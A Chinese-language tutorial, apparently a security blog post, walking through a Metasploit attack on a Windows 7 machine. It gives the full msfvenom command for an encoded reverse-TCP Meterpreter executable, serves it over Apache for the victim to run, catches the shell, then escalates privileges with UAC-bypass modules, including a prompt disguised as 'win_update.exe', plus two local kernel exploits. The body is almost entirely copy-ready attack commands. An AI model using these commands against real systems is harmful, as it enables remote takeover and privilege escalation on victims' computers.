kali 绕过uac提权

  1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe --产生一个exe文件

08764-5sz6ove03gk.png

  1. service apache2 start --开启apache服务
  2. service postgresql start --开启msf数据库服务
  3. cp ./a.exe /var/www/html/ --在http目录下

98849-ouyqk9fvf79.png

  1. 打开win7访问kali ip 下载a.exe

99079-7z863trqd4e.png
92273-38e3116pd08.png

  1. Msfconsole --启动msf

67020-fybfry8vfyc.png

  1. use exploit/multi/handler --使用这个模块

66442-dph2g4cvoq8.png

  1. set payload windows/meterpreter/reverse_tcp --配置payload

93242-bnjiqqcx34.png

  1. set lhost 192.168.2.128 --配置kali ip

05571-kysmdz9at3c.png

  1. set lport 4444 --配置监听端口 和exe文件端口一样
  2. Show options --查看一下参数

34452-wtiuueysa5.png

  1. exploit -j --开始监听

88103-zouqtka750n.png

  1. 然后在win7电脑上运行a.Exe

98213-tpmhtpshs1i.png

  1. 在kali上就会返回一个会话用sessions 查看

84031-82ah6jijd88.png

  1. sessions -i 1 --进入会话

09851-7an992k56ar.png

  1. load priv --更新插件

02289-jgoc0xkxyw.png

  1. Getsystem --获取权限 发现没有权限 需要提权
  2. Background --退出会话

18909-joy7kg4ez6r.png

  1. use exploit/windows/local/ask --进入提权模块

18853-jsxb14k6m5i.png

  1. show options --查看配置参数

57084-b9h2ujiaxql.png

  1. set payload windows/meterpreter/reverse_tcp --设置payload
  2. set lhost 192.168.2.128 --设置kali ip
  3. set filename win_update.exe --设置win弹窗名字
  4. set filename win_update.exe --设置会话
  5. show options

58670-53c53nkfle7.png

  1. Exploit --攻击 会多一个会话
  2. sessions -i 2 --进入会话
  3. load priv 更新插件
  4. Getsystem --提权

54599-rabtmnhf83g.png

--上边那个提权还要弹窗 接下来再说一个模块不需要用户在点击 “是”

  1. use exploit/windows/local/bypassuac_injection
  2. set payload windows/meterpreter/reverse_tcp
  3. Set lhost 192.168.2.128
  4. set session 1
  5. exploit --在得到一个提权的会话
  6. 还有2个模块可以用提权以下是 模块和payload(参数配置如上)
  7. use exploit/windows/local/ms13_053_schlamperei
  8. payload windows/meterpreter/reverse_tcp
  9. use exploit/windows/local/ppr_flatten_rec
  10. payload windows/meterpreter/reverse_tcp

-- set payload windows/viewomly/reverse_tcp
-- set viewonly no(这个payload可以用图型话界面 设置viewonly为 no可以操作)

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
所有雷电接口电脑5分钟内即可破解,且漏洞无法软件修复
« 上一篇 05-12
SaltStack漏洞复现
下一篇 » 05-13

相关推荐

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...